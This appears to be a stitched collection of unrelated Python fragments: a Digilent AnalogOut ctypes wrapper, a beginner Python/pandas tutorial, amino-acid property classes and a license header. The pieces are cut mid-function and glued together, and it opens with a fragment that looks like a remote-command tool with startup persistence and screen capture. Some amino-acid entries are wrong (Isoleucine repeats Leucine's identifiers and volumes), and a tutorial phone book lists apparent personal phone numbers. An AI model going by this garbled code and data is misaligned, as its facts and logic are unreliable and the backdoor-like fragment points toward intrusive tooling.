remote_command(ipv4, password, add_to_startup)
print("[+] ScreenCapture | |
|AnalogOut| channel.
node (DwfAnalogOutNode): The channel node.
Returns:
float: The currently configured node phase value, in degrees.
Raises:
DwfLibraryError: An error occurred while executing the operation.
"""
c_phase = typespec_ctypes.c_double()
result = self.lib.FDwfAnalogOutNodePhaseGet(
self.hdwf,
channel_index,
node.value,
c_phase)
if result != RESULT_SUCCESS:
raise self.dwf.exception()
phase = c_phase.value
return phase
####################################################################################################################
# #
# NODE DATA MANAGEMENT #
# #
####################################################################################################################
def nodeDataInfo(self, channel_index: int, node: DwfAnalogOutNode) -> Tuple[float, float]:
"""Get data range for an |AnalogOut| channel node, in samples.
Parameters:
channel_index (int): The |AnalogOut| channel.
node (DwfAnalogOutNode): The channel node.
Returns:
Tuple[float, float]: The range of valid values.
Raises:
DwfLibraryError: An error occurred while executing the operation.
"""
c_samples_min = typespec_ctypes.c_int()
c_samples_max = typespec_ctypes.c_int()
result = self.lib.FDwfAnalogOutNodeDataInfo(
self.hdwf,
channel_index,
node.value,
c_samples_min,
c_samples_max)
if result != RESULT_SUCCESS:
raise self.dwf.exception()
samples_min = c_samples_min.value
samples_max = c_samples_max.value
return (samples_min, samples_max)
def nodeDataSet(self, channel_index: int, node: DwfAnalogOutNode, data: np.ndarray) -> None:
"""Set the data for an |AnalogOut| channel node.
Parameters:
channel_index (int): The |AnalogOut| channel.
node (DwfAnalogOutNode): The channel node.
data (np.ndarray): The data.
Raises:
DwfLibraryError: An error occurred while executing the operation.
"""
double_data = data.astype(np.float64)
result = self.lib.FDwfAnalogOutNodeDataSet(
self.hdwf,
channel_index,
node.value,
double_data.ctypes.data_as(typespec_ctypes.c_double_ptr),
len(double_data))
if result != RESULT_SUCCESS:
raise self.dwf.exception()
def nodePlayStatus(self, channel_index: int, node: DwfAnalogOutNode) -> Tuple[int, int, int]:
"""Get the play status for an |AnalogOut| channel node.
Parameters:
channel_index (int): The |AnalogOut| channel.
node (DwfAnalogOutNode): The channel node.
Returns:
Tuple[int, int, int]: The *free*, *lost*, and *corrupted* status counts, in samples.
Raises:
DwfLibraryError: An error occurred while executing the operation.
"""
c_data_free = typespec_ctypes.c_int()
c_data_lost = typespec_ctypes.c_int()
c_data_corrupted = typespec_ctypes.c_int()
result = self.lib.FDwfAnalogOutNodePlayStatus(
self.hdwf,
channel_index,
node.value,
c_data_free,
c_data_lost,
c_data_corrupted)
if result != RESULT_SUCCESS:
raise self.dwf.exception()
data_free = c_data_free.value
data_lost = c_data_lost.value
data_corrupted = c_data_corrupted.value
return (data_free, data_lost, data_corrupted)
def nodePlayData(self, channel_index: int, node: DwfAnalogOutNode, data: np.ndarray) -> None:
"""Provide the playback data for an |AnalogOut| channel node.
Parameters:
channel_index (int): The |AnalogOut| channel.
node (DwfAnalogOutNode): The channel node.
data (np.ndarray): The playback data.
Raises:
DwfLibraryError: An error occurred while executing the operation.
"""
result = self.lib.FDwfAnalogOutNodePlayData(
self.hdwf,
channel_index,
node.value,
data.ctypes.data_as(typespec_ctypes.c_double_ptr),
len(data))
if result != RESULT_SUCCESS:
raise self.dwf.exception()
####################################################################################################################
# #
# CARRIER CONFIGURATION (OBSOLETE) #
# #
####################################################################################################################
def enableSet(self, channel_index: int, enable: bool) -> None:
"""Enable or disable the specified |AnalogOut| channel.
Warning:
**This method is obsolete.**
Use the :py:meth:`nodeEnableSet` method instead.
Parameters:
channel_index (int): The |AnalogOut| channel.
enable (bool): The enable setting.
Raises:
DwfLibraryError: An error occurred while executing the operation.
"""
result = self.lib.FDwfAnalogOutEnableSet(self.hdwf, channel_index, enable)
if result != RESULT_SUCCESS:
raise self.dwf.exception()
def enableGet(self, channel_index: int) -> bool:
"""Get the current enable/disable status of the specified |AnalogOut| channel.
Warning:
**This method is obsolete.**
Use the :py:meth:`nodeEnableGet` method instead.
Parameters:
channel_index (int): The |AnalogOut| channel.
Returns:
bool: The enable state of the channel.
Raises:
DwfLibraryError: An error occurred while executing the operation.
"""
c_enable = typespec_ctypes.c_int()
result = self.lib.FDwfAnalogOutEnableGet(self.hdwf, channel_index, c_enable)
if result != RESULT_SUCCESS:
raise self.dwf.exception()
enable = bool(c_enable.value)
return enable
def functionInfo(self, channel_index: int) -> List[DwfAnalogOutFunction]:
"""Get the |AnalogOut| channel waveform shape function info.
Warning:
**This method is obsolete.**
Use the :py:meth:`nodeFunctionInfo` method instead.
Returns:
List[DwfAnalogOutFunction]: The valid waveform shape functions.
Parameters:
channel_index (int): The |AnalogOut| channel.
Raises:
DwfLibraryError: An error occurred while executing the operation.
"""
c_function_info_bitset = typespec_ctypes.c_unsigned_int()
result = self.lib.FDwfAnalogOutFunctionInfo(self.hdwf, channel_index, c_function_info_bitset)
if result != RESULT_SUCCESS:
raise self.dwf.exception()
function_info_bitset = c_function_info_bitset.value
function_info_list = [function_ for function_ in DwfAnalogOutFunction
if function_info_bitset & (1 << function_.value)]
return function_info_list
def functionSet(self, channel_index: int, func: DwfAnalogOutFunction) -> None:
"""Set the |AnalogOut| channel waveform shape function.
Warning:
**This method is obsolete.**
Use the :py:meth:`nodeFunctionSet` method instead.
Parameters:
channel_index (int): The |AnalogOut| channel.
func (DwfAnalogOutFunction): The waveform shape function to use.
Raises:
DwfLibraryError: An error occurred while executing the operation.
"""
result = self.lib.FDwfAnalogOutFunctionSet(self.hdwf, channel_index, func.value)
if result != RESULT_SUCCESS:
raise self.dwf.exception()
def functionGet(self, channel_index: int) -> DwfAnalogOutFunction:
"""Get the |AnalogOut| channel waveform shape function.
Warning:
**This method is obsolete.**
Use the :py:meth:`nodeFunctionGet` method instead.
Parameters:
channel_index (int): The |AnalogOut| channel.
Returns:
DwfAnalogOutFunction: The currently configured waveform shape function.
Raises:
DwfLibraryError: An error occurred while executing the operation.
"""
c_func = typespec_ctypes.DwfAnalogOutFunction()
result = self.lib.FDwfAnalogOutFunctionGet(self.hdwf, channel_index, c_func)
if result != RESULT_SUCCESS:
raise self.dwf.exception()
func = DwfAnalogOutFunction(c_func.value)
return func
def frequencyInfo(self, channel_index: int) -> Tuple[float, float]:
"""Get the |AnalogOut| channel valid frequency range, in Hz.
Warning:
**This method is obsolete.**
Use the :py:meth:`nodeFrequencyInfo` method instead.
Parameters:
channel_index (int): The |AnalogOut| channel.
Returns:
Tuple[float, float]: The valid frequency range, in Hz.
Raises:
DwfLibraryError: An error occurred while executing the operation.
"""
c_hzMin = typespec_ctypes.c_double()
c_hzMax = typespec_ctypes.c_double()
result = self.lib.FDwfAnalogOutFrequencyInfo(self.hdwf, channel_index, c_hzMin, c_hzMax)
if result != RESULT_SUCCESS:
raise self.dwf.exception()
hzMin = c_hzMin.value
hzMax = c_hzMax.value
return (hzMin, hzMax)
def frequencySet(self, channel_index: int, frequency: float) -> None:
"""Set the |AnalogOut| channel frequency, in Hz.
Warning:
**This method is obsolete.**
Use the :py:meth:`nodeFrequencySet` method instead.
Parameters:
channel_index (int): The |AnalogOut| channel.
frequency (float): The frequency to use.
Raises:
DwfLibraryError: An error occurred while executing the operation.
"""
result = self.lib.FDwfAnalogOutFrequencySet(self.hdwf, channel_index, frequency)
if result != RESULT_SUCCESS:
raise self.dwf.exception()
def frequencyGet(self, channel_index: int) -> float:
"""Get the |AnalogOut| channel frequency, in Hz.
Warning:
**This method is obsolete.**
Use the :py:meth:`nodeFrequencyGet` method instead.
Parameters:
channel_index (int): The |AnalogOut| channel.
Returns:
float: The currently configured frequency, in Hz.
Raises:
DwfLibraryError: An error occurred while executing the operation.
"""
c_hzFrequency = typespec_ctypes.c_double()
result = self.lib.FDwfAnalogOutFrequencyGet(self.hdwf, channel_index, c_hzFrequency)
if result != RESULT_SUCCESS:
raise self.dwf.exception()
hzFrequency = c_hzFrequency.value
return hzFrequency
def amplitudeInfo(self, channel_index: int) -> Tuple[float, float]:
"""Get the |AnalogOut| channel amplitude range info.
Warning:
**This method is obsolete.**
Use the :py:meth:`nodeAmplitudeInfo` method instead.
Parameters:
channel_index (int): The |AnalogOut| channel.
Returns:
Tuple[float, float]: The range of valid amplitudes, in Volts.
Raises:
DwfLibraryError: An error occurred while executing the operation.
"""
c_amplitude_min = typespec_ctypes.c_double()
c_amplitude_max = typespec_ctypes.c_double()
result = self.lib.FDwfAnalogOutAmplitudeInfo(self.hdwf, channel_index, c_amplitude_min, c_amplitude_max)
if result != RESULT_SUCCESS:
raise self.dwf.exception()
amplitude_min = c_amplitude_min.value
amplitude_max = c_amplitude_max.value
return (amplitude_min, amplitude_max)
def amplitudeSet(self, channel_index: int, amplitude: float) -> None:
"""Set the |AnalogOut| channel amplitude.
Warning:
**This method is obsolete.**
Use the :py:meth:`nodeAmplitudeSet` method instead.
Parameters:
channel_index (int): The |AnalogOut| channel.
amplitude (float): The amplitude, in Volts.
Raises:
DwfLibraryError: An error occurred while executing the operation.
"""
result = self.lib.FDwfAnalogOutAmplitudeSet(self.hdwf, channel_index, amplitude)
if result != RESULT_SUCCESS:
raise self.dwf.exception()
def amplitudeGet(self, channel_index: int) -> float:
"""Get the |AnalogOut| channel amplitude.
Warning:
**This method is obsolete.**
Use the :py:meth:`nodeAmplitudeGet` method instead.
Parameters:
channel_index (int): The |AnalogOut| channel.
Returns:
float: The currently configured amplitude, in Volts.
Raises:
DwfLibraryError: An error occurred while executing the operation.
"""
c_amplitude = typespec_ctypes.c_double()
result = self.lib.FDwfAnalogOutAmplitudeGet(self.hdwf, channel_index, c_amplitude)
if result != RESULT_SUCCESS:
raise self.dwf.exception()
amplitude = c_amplitude.value
return amplitude
def offsetInfo(self, channel_index: int) -> Tuple[float, float]:
"""Get the |AnalogOut| channel offset range info, in Volts.
Warning:
**This method is obsolete.**
Use the :py:meth:`nodeOffsetInfo` method instead.
Parameters:
channel_index (int): The |AnalogOut| channel.
Returns:
Tuple[float, float]: The valid range of offset values, in Volts.
Raises:
DwfLibraryError: An error occurred while executing the operation.
"""
c_offset_min = typespec_ctypes.c_double()
c_offset_max = typespec_ctypes.c_double()
result = self.lib.FDwfAnalogOutOffsetInfo(self.hdwf, channel_index, c_offset_min, c_offset_max)
if result != RESULT_SUCCESS:
raise self.dwf.exception()
offset_min = c_offset_min.value
offset_max = c_offset_max.value
return (offset_min, offset_max)
def offsetSet(self, channel_index: int, offset: float) -> None:
    """Set the |AnalogOut| channel offset, in Volts.

    Warning:
        **This method is obsolete.**

        Use the :py:meth:`nodeOffsetSet` method instead.

    Parameters:
        channel_index (int): The |AnalogOut| channel.
        offset (float): The channel offset to configure, in Volts.

    Raises:
        DwfLibraryError: An error occurred while executing the operation.
    """
    # Surface any library-level failure as a DwfLibraryError.
    if self.lib.FDwfAnalogOutOffsetSet(self.hdwf, channel_index, offset) != RESULT_SUCCESS:
        raise self.dwf.exception()
def offsetGet(self, channel_index: int) -> float:
"""Get the |AnalogOut| channel offset, in Volts.
Warning:
**This method is obsolete.**
Use the :py:meth:`nodeOffsetGet` method instead.
Parameters:
channel_index (int): The |AnalogOut| channel.
Returns:
float: The valid offset value, in Volts.
Raises:
DwfLibraryError: An error occurred while executing the operation.
"""
c_offset = typespec_ctypes.c_double()
result = self.lib.FDwfAnalogOutOffsetGet(self.hdwf, channel_index, c_offset)
| |
# ----------------------------------------------------------------------
# Python basics tutorial script: comments, variables, type conversion,
# console I/O, modules, strings, control flow, lists, dicts, NumPy,
# pandas Series/DataFrame, and a small EDA of a salaries CSV.
# NOTE(review): this is REPL-style teaching code -- a few lines below
# raise on purpose (immutability demos, ValueError demo), so the file is
# meant to be run line-by-line, not executed top to bottom.
# ----------------------------------------------------------------------
#Commenting for single
'''
Commenting for multiple lines
'''
#How to declare variables in Python
my_age = 40
#One variable can hold different data type
# Integer
my_var = 8
type(my_var)
# Float
my_var = 26.5
type(my_var)
# String
my_var = "FORSK"
type(my_var)
# Boolean
my_var = True
type(my_var)
# NoneType
my_var = None
type(my_var)
"""
Type Conversion using Global Functions
int()
float()
str()
bool()
"""
#How to convert the data type
int (10.6)
int ("10")
float (4)
float ("10")
str (4)
str (10.6)
bool (4) # Any integer greater than zero is True
bool (0)
bool (10.6) # Any float greater than 0.0 is True
bool(0.0)
bool(-90)
bool ("10")
bool("")
bool (None)
#Taking Integer Input from user
# input() always returns a str; cast explicitly before arithmetic.
age = input ( "Enter your Age > ")
print (age)
print (type(age))
age = int(age)
print (age)
print (type(age))
#Taking Floating Point Input from user
temperature = input ( "Enter your temperature of your city > ")
print (temperature)
print (type(temperature))
temperature = float(temperature)
print (temperature)
print (type(temperature))
#Taking String Input from user using raw_input function
name = input ( "Enter your Name >")
print (name)
print (type(name))
#Printing Output to the screen using single quote
print ( 'FORSK TECHNOLOGIES' )
#Printing Output to the screen using double quote
print ( "FORSK TECHNOLOGIES" )
#Using Triple Quotes to print quotation marks in string
print ("""FORSK"S TECHNOLOGIES""")
# Importing Modules
import math
math.sqrt ( 16 )
math.log ( 16, 2 )
math.cos ( 0 )
math.isnan(90)
# Importing Names from a Module Directly
#How to use specific functions from packages or modules in python
from math import sqrt
sqrt ( 16 )
#How to use specific functions from packages or modules
#and also aliasing
from math import sqrt as square
square ( 16 )
# How to find the function within the Module/Package
dir ( math )
help (math.sqrt)
#Slicing of strings
newstr = "<NAME>"
# Indexing using Left to Right
#START
print(newstr [ 0 ]) # 1st thing (0-indexed)
print(newstr [ -12 ])
# Indexing using Right to Left
print (newstr [ -1 ] ) # Last thing
#START and END
print(newstr[:3]) # First three things
print(newstr[-3:]) # Last three things
print(newstr[3:]) # Everything *except* the first three
print(newstr[:-3]) # Everything *except* the last three\
newstr [ 6:10 ]
newstr [ : 5 ]
newstr [ 6 : ]
newstr [ : ]
#Strings in python are Immutable
newstr = "<NAME>"
newstr [ 0 ] = "m" # raises TypeError: str does not support item assignment
#or
del newstr [ 0 ] # raises TypeError: str does not support item deletion
del newstr # deleting the whole name binding IS allowed
"""
Global Inbuilt function ( len and del )
"""
newstr = "<NAME>"
len ( newstr )
print ( newstr )
del ( newstr )
# String functions
# ( lower, upper, find, replace, strip, lstrip, rstrip, split, join)
# creates a new copy of the string
newstr = " <NAME> "
print(newstr)
newstr.lower() # returns a NEW string; newstr itself is unchanged
print(newstr)
newstr2= newstr.lower()
print(newstr2)
newstr.upper()
newstr.find('r')
newstr.find('P')
newstr.replace(' ','\n')
newstr.lstrip()
newstr.rstrip()
newstr.strip()
newstr.split()
newstr.index('M')
string="Rajasthan"
" ".join( string )
#to list all the functions for an object
dir ( str )
#to check the syntax for a specific function of the object
help ( str.strip )
#Take the age as input from the user and print
age = int(input("Enter your age>"))
#Take the age as input from the user and print
age = int(input("Enter your age>"))
if ( age > 0 ):
    print ("Valid Age")
else:
    print ("Invalid Age")
"""
Looping technique using while
"""
n = 0
while (n < 10):
    print (n)
    n = n + 1
    #n += 1
"""
List
"""
#List Creation
my_list = [ 1, 2, 3 ]
print(my_list)
#Adding single items in the list in the last
my_list.append( 5 )
print(my_list)
#Adding single item in the list at a specific position in the list
my_list.insert ( 0, 0 )
print(my_list)
#Remove a specific item by its value from the list
my_list.remove ( 4 ) #( ValueError here since 4 is not in the list )
# Accessing the values of the list using index
print(my_list[0])
#Sorting of the list items
print(my_list)
my_list.sort()
print (my_list)
# Membership Operators
# in , not in
# Used to check if some single item is in a larger collection
# Return True if the item is in list
# Return False if the item is not in list
# Example
some_list = [1,2,3,5,6,2,4,3,5,6,7,8,1,2,3]
3 in some_list # will return True
3 not in some_list # will return False
7 not in some_list # will return True
# Hand on Challenge
# Strip every occurrence of 3 from the list.
while (3 in some_list):
    some_list.remove(3)
print (some_list)
"""
Looping technique using for each
"""
my_list = [0,1,2,3,4,5,6]
for number in my_list:
    print (number)
# default the range starts from 0
our_list = list(range(13))
print (type(our_list))
print (our_list)
for number in list(range (13)):
    print (number)
for number in list(range (1,13)):
    print (number)
"""
dictionary
"""
phone_book = { 'Vidhan':8504982228, 'Aayushi':8905336615, 'Vibhooti':9414701291 }
print(phone_book)
print(type(phone_book))
# Creation of dictionaries
dict1 = {'fname':'John', 'lname':'Mille', 'profession':'plumber', 'age':'32'}
print(dict1)
# Add/Update
dict1['lname'] = 'Miller'
dict1['profession'] = 'electrician'
dict1['age'] = '36'
dict1['city'] = 'NY' #add
print(dict1)
dict1['city'] = 'MA' #update
print(dict1)
dict1.update ( {'age':32, 'city':'NY' } )
print(dict1)
# Printing Values
print (dict1["lname"])
print (dict1.get('lname'))
print (dict1.get('name')) # get() returns None instead of raising KeyError
print (dict1.get('name', 'Not Found'))
dict1 = {'fname':'John', 'lname':'Miller', 'profession':'plumber', 'age':'32'}
# To list all the keys
a = dict1.keys()
print(a)
print(type(a))
# To list all the values
print(dict1.values())
# To list all the values
print(dict1.items())
# To list all values and keys
for key in dict1:
    print ( key , dict1[key] )
for key in dict1:
    print ( key , dict1.get(key) )
"""
NumPy
"""
a = [0,1,2,3,4,5,6,7,8]
print (type(a))
print (a)
# it always prints the values with comma seperated , thats list
# Convert your list data to NumPy arrays
import numpy as np
x = np.array( a )
print (type(x))
print (x)
# it always prints the values WITHOUT comma seperated , thats ndarray
# to print the data type of the elements of array
print (x.dtype)
# to print the dimension of the array
print (x.ndim)
# to print the shape of the array
# returns a tuple listing the length of the array along each dimension
# For a 1D array, the shape would be (n,)
# where n is the number of elements in your array.
print (x.shape)
# Array Indexing will always return the data type object
print (x[0])
print (x[2])
print (x[-1])
"""
Series
"""
#Import Python Libraries
import pandas as pd
# Create an Empty Series
# NOTE(review): newer pandas warns on Series() without an explicit dtype.
s = pd.Series()
print (type(s))
print (s)
# Create a Series from ndarray
import numpy as np
data = np.array(['a','b','c','d'])
print (type(data ))
s = pd.Series(data)
print (type(s))
print (s)
# We did not pass any index, so by default,
# it assigned the indexes ranging from 0 to len(data)-1, i.e., 0 to 3.
#retrieve the first element
print (s[0])
#retrieve the first three element
print (s[:3])
#retrieve the last three element
print (s[-3:])
# Customised Index value
data = np.array(['a','b','c','d'])
s = pd.Series(data,index=[100,101,102,103])
print (s)
"""
DataFrame
"""
# A Data frame is a two-dimensional data structure, i.e.,
# data is aligned in a tabular fashion in rows and columns.
# You can think of it as an SQL table or a spreadsheet data representation
import pandas as pd
#Create an Empty DataFrame
df = pd.DataFrame()
print (df)
# Create a DataFrame from Lists
data = [1,2,3,4,5]
df = pd.DataFrame(data)
print (df)
# Create a DataFrame from List of Lists
data = [['Alex',10],['Bob',12],['Clarke',13]]
df = pd.DataFrame(data,columns=['Name','Age'])
print (df)
"""
Exploratory Data Analysis of Salaries Data
"""
"""
1. Which Male and Female Professor has the highest and the lowest salaries.
2. Which Professor takes the highest and lowest salaries.
3. Missing Salaries - should be mean salaries.
4. Missing phd - should be mean phd.
5. How many are Male Staff and How many are Female Staff.
6. How many are Prof, AssocProf and AsstProf.
7. Who are the senior and junior most employees in the organization.
"""
import pandas as pd
#Read csv file
# assumes ./data/Salaries.csv exists relative to the working directory
df = pd.read_csv("data/Salaries.csv")
# Not a good technique to print the Data Frame
print (df)
df.info()
#List first 5 records
df.head()
#Can you guess how to view the last few records;
df.tail(5)
# Gives the row Indexes
df.index
#list the column names / column Indexes
df.columns
#Check types for all the columns
df.dtypes
#numpyrepresentation of the data
df.values
# generate descriptive statistics (for numeric columns only)
# Standard Deviation is quite useful tool to figure out
# how the data is spread above or below the mean.
# The higher the value, the less is reliable or vice versa.
df.describe() # Numeric Columns
#return max/min values for all columns
df.max()
df.min()
#return max/min values for all numeric columns
df.mean()
df.median()
df.std()
#returns a random sample of the data frame
df.sample(5)
"""
Data Frames: method loc
If we need to select a range of rows, using their labels/index
we can use method loc
"""
df.loc[:1]
df.loc[10:20,['rank','sex']]
"""
Data Frames: method iloc
If we need to select a range of rows and/or columns,
using their positions we can use method iloc
"""
df.iloc[:2]
df.iloc[ 10:21 , [0,4] ]
"""
Selecting a column in a Data Frame with all rows
"""
df.iloc[:,2]
df.loc[:,'phd']
# Read the data from a specific Series
df.phd
# Dont use this technique
# (df.rank resolves to the DataFrame.rank METHOD, not the 'rank' column)
df.rank
# This is the best practice
df['phd']
#Select column rank and salary:
df[['rank','salary']]
# Find unique values in a Series / Column
df['rank'].unique()
df['discipline'].unique()
df['sex'].unique()
list1 = df['sex'].unique().tolist()
# intuition about a Rank Series
df['rank']
df['rank'].value_counts()
# to show in Percentage
class AminoAcid:
    """Base class describing one amino-acid residue and its physical
    properties.

    Subclasses (Ala, Val, Leu, ...) overwrite the default attribute
    values in their own __init__ with residue-specific data.
    """

    def __init__(self,name='AA'):
        # One-letter residue code (e.g. 'A' for alanine).
        self.name = name
        # Three-letter residue code (e.g. 'ALA'); filled in by subclasses.
        self.name3L = ''
        self.Hydrophobic = 0 # 1: Hydrophobic, 0: Hydrophilic
        self.charge = 0
        self.polar = 0
        self.corner = 0 # Would prefer to be at a corner : give positive value
        self.loop = 0 # cost/benefit when on a loop
        self.size = 0 # Residue size (0:1) 0:ignor size, 1:Large residue
        self.SpecialRes = {0:0} # Special characteristic of residue
        self.ResWeight = 0 # residue weight (weight - 56) backbone weight is 56
        self.ResVol = 0 # Residue volume from http://prowl.rockefeller.edu/aainfo/volume.htm
        self.SideChainVol = 0 # Side Chain volume is evaluated as ResVol - 0.9 Gly.ResVol
        self.Hydropathy = 0 # Hydropathy index
        self.n1 = 0
        self.n2 = 0
        # n values
        # -1 when the amino acid (AA) residue has an N donor, short residue.
        # -2 when the AA residue has an O acceptor, short residue.
        # -3 when the AA residue has an N donor, long residue that able to bond across two turns.
        # -5 when the AA residue has an O acceptor, long residue that able to bond across two turns.
        # -7 when it is a Cystine(C)
        # 0 when bond is not possible.
        # 1 when this N or O participating in a bond.
        # A residu can only participate in one side-chain bond. So when a bond is created
        # for example with n1, n1 get the bond value and n2 will be assigned 0

    def __mul__ (self,other):
        # Evaluating side chain interaction
        # NOTE(review): neither this class nor the visible subclasses define
        # `donor`/`acceptor`, so this raises AttributeError unless those
        # attributes are set elsewhere -- confirm the intended attributes
        # (possibly n1/n2).
        Prod = self.donor * other.acceptor
        return Prod
# ############ Non Polar, HydroPhobic ###########
class Ala(AminoAcid):
    """Alanine (A / ALA): non-polar, hydrophobic amino acid.

    CH3-CH(NH2)-COOH; MW 89.09 Da; hydrophobicity 0.616
    (Analytical Biochemistry 193:11, 72-82, Elsevier 1991);
    hydropathy index 1.8 (J. Mol. Bio. (1982) 157, 105-132);
    isoelectric point pH 6.01; pKa(alpha-COOH) 2.35;
    pKa(alpha-NH2) 9.87; CAS 56-41-7; PubChem 5950.
    """

    def __init__(self):
        AminoAcid.__init__(self, 'A')
        self.name3L = 'ALA'
        # Classification flags: hydrophobic, uncharged, non-polar.
        self.Hydrophobic = 1
        self.charge = 0
        self.polar = 0
        # No corner/loop placement preference; residue size ignored.
        self.corner = 0
        self.loop = 0
        self.size = 0
        self.SpecialRes = {0: 0}
        # No side-chain hydrogen-bond donor/acceptor slots.
        self.n1 = 0
        self.n2 = 0
        # Physical properties.
        self.Hydropathy = 1.8
        self.ResWeight = 33
        self.ResVol = 88.6
        self.SideChainVol = self.ResVol - 54.1  # residue volume minus backbone share
class Val(AminoAcid):
    """Valine (V / VAL): essential, non-polar, hydrophobic amino acid.

    (CH3)2-CH-CH(NH2)-COOH; MW 117.15 Da; hydrophobicity 0.825
    (Analytical Biochemistry 193:11, 72-82, Elsevier 1991);
    hydropathy index 4.2 (J. Mol. Bio. (1982) 157, 105-132);
    isoelectric point 6.00; pKa(alpha-COOH) 2.39;
    pKa(alpha-NH2) 9.74; CAS 72-18-4; PubChem 1182.
    """

    def __init__(self):
        AminoAcid.__init__(self, 'V')
        self.name3L = 'VAL'
        # Classification flags: hydrophobic, uncharged, non-polar.
        self.Hydrophobic = 1
        self.charge = 0
        self.polar = 0
        # No corner/loop placement preference; residue size ignored.
        self.corner = 0
        self.loop = 0
        self.size = 0
        self.SpecialRes = {0: 0}
        # No side-chain hydrogen-bond donor/acceptor slots.
        self.n1 = 0
        self.n2 = 0
        # Physical properties.
        self.Hydropathy = 4.2
        self.ResWeight = 61
        self.ResVol = 140.0
        self.SideChainVol = self.ResVol - 54.1  # residue volume minus backbone share
class Leu(AminoAcid):
    """Leucine (L / LEU): essential, non-polar, hydrophobic amino acid.

    (CH3)2-CH-CH2-CH(NH2)-COOH; MW 131.18 Da; hydrophobicity 0.943
    (Analytical Biochemistry 193:11, 72-82, Elsevier 1991);
    hydropathy index 3.8 (J. Mol. Bio. (1982) 157, 105-132);
    isoelectric point 6.01; pKa(alpha-COOH) 2.33;
    pKa(alpha-NH2) 9.74; CAS 61-90-5; PubChem 6106.
    """

    def __init__(self):
        AminoAcid.__init__(self, 'L')
        self.name3L = 'LEU'
        # Classification flags: hydrophobic, uncharged, non-polar.
        self.Hydrophobic = 1
        self.charge = 0
        self.polar = 0
        # No corner/loop placement preference; residue size ignored.
        self.corner = 0
        self.loop = 0
        self.size = 0
        self.SpecialRes = {0: 0}
        # No side-chain hydrogen-bond donor/acceptor slots.
        self.n1 = 0
        self.n2 = 0
        # Physical properties.
        self.Hydropathy = 3.8
        self.ResWeight = 75
        self.ResVol = 166.7
        self.SideChainVol = self.ResVol - 54.1  # residue volume minus backbone share
class Ile(AminoAcid):
    """Isoleucine (I / ILE): essential, non-polar, hydrophobic amino acid.

    CH3-CH2-CH(CH3)-CH(NH2)-COOH; MW 131.18 Da; hydrophobicity 0.943
    (Analytical Biochemistry 193:11, 72-82, Elsevier 1991);
    hydropathy index 4.5 (J. Mol. Bio. (1982) 157, 105-132);
    isoelectric point 6.05; pKa(alpha-COOH) 2.33;
    pKa(alpha-NH2) 9.74; CAS 61-90-5; PubChem 6106.
    """

    def __init__(self):
        AminoAcid.__init__(self, 'I')
        self.name3L = 'ILE'
        # Classification flags: hydrophobic, uncharged, non-polar.
        self.Hydrophobic = 1
        self.charge = 0
        self.polar = 0
        # No corner/loop placement preference; residue size ignored.
        self.corner = 0
        self.loop = 0
        self.size = 0
        self.SpecialRes = {0: 0}
        # No side-chain hydrogen-bond donor/acceptor slots.
        self.n1 = 0
        self.n2 = 0
        # Physical properties.
        self.Hydropathy = 4.5
        self.ResWeight = 75
        self.ResVol = 166.7
        self.SideChainVol = self.ResVol - 54.1  # residue volume minus backbone share
class Phe(AminoAcid):
    """Phenylalanine (F / PHE): essential, non-polar, hydrophobic amino acid.

    Ph-CH2-CH(NH2)-COOH (benzyl side chain, C6H5-CH2); MW 165.19 Da;
    hydrophobicity 1 (Analytical Biochemistry 193:11, 72-82, Elsevier 1991);
    hydropathy index 2.8 (J. Mol. Bio. (1982) 157, 105-132);
    isoelectric point 5.49; pKa(alpha-COOH) 2.20;
    pKa(alpha-NH2) 9.31; CAS 63-91-2; PubChem 994.
    """

    def __init__(self):
        AminoAcid.__init__(self, 'F')
        self.name3L = 'PHE'
        # Classification flags: hydrophobic, uncharged, non-polar.
        self.Hydrophobic = 1
        self.charge = 0
        self.polar = 0
        # No corner/loop placement preference; residue size ignored.
        self.corner = 0
        self.loop = 0
        self.size = 0
        self.SpecialRes = {0: 0}
        # No side-chain hydrogen-bond donor/acceptor slots.
        self.n1 = 0
        self.n2 = 0
        # Physical properties.
        self.Hydropathy = 2.8
        self.ResWeight = 109
        self.ResVol = 189.9
        self.SideChainVol = self.ResVol - 54.1  # residue volume minus backbone share
class Trp(AminoAcid):
    """Tryptophan (W / TRP): essential, non-polar, hydrophobic amino acid.

    Ph-NH-CH=C-CH2-CH(NH2)-COOH with an indole functional group: an
    aromatic, bicyclic heterocycle (six-membered benzene ring fused to a
    five-membered nitrogen-containing pyrrole ring).

    MW 204.23 Da; hydrophobicity 0.878 (Analytical Biochemistry 193:11,
    72-82, Elsevier 1991); hydropathy index -0.9 (J. Mol. Bio. (1982)
    157, 105-132); isoelectric point 5.89; pKa(alpha-COOH) 2.46;
    pKa(alpha-NH2) 9.41; CAS 73-22-3; PubChem 6305.
    """

    def __init__(self):
        AminoAcid.__init__(self, 'W')
        self.name3L = 'TRP'
        # Classification flags: hydrophobic, uncharged, non-polar.
        self.Hydrophobic = 1
        self.charge = 0
        self.polar = 0
        # No corner/loop placement preference; residue size ignored.
        self.corner = 0
        self.loop = 0
        self.size = 0
        self.SpecialRes = {0: 0}
        # No side-chain hydrogen-bond donor/acceptor slots.
        self.n1 = 0
        self.n2 = 0
        # Physical properties.
        self.Hydropathy = -0.9
        self.ResWeight = 148
        self.ResVol = 227.8
        self.SideChainVol = self.ResVol - 54.1  # residue volume minus backbone share
class Met(AminoAcid):
def __init__(self):
AminoAcid.__init__(self,'M')
# Methionine
# ############
# CH3-S-(CH2)2-CH(NH2)-COOH
# sulfur-containing residue
# methyl donor R-CH3
# methionine is incorporated into the N-terminal position of all proteins
# in eukaryotes and archaea during translation, although it is usually removed
# by post-translational modification
#
# Essential AA
# Molecular weight 149.21 Da
# Non ploar
# Acidity - Natural
# Hydrophobicity 0.738 (Analytical Bio chemistry 193:11,72-82 Elsevier 1991)
# Hydrophathy index 1.9 (J.Mol.Bio(1982) 157, 105-132)
# Isoelectric point 5.74
# pKa( alpha-COOH) 2.13
# pKa( alpha-NH2) 9.28
# CAS # 63-68-3
# PubChem ID 876
#
self.Hydropathy = 1.9
self.ResWeight = 93
self.name3L = 'MET'
self.Hydrophobic = 1 # 1: Hydrophobic, 0: Hydrophilic
self.charge = 0
self.polar = 0
self.corner = 0 # Would prefer to be at a corner : give positive value
self.loop = 0 # cost/benefit | |
<reponame>bluthen/isadore_electronics
#!/usr/bin/python
# Copyright 2010-2019 <NAME>, <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
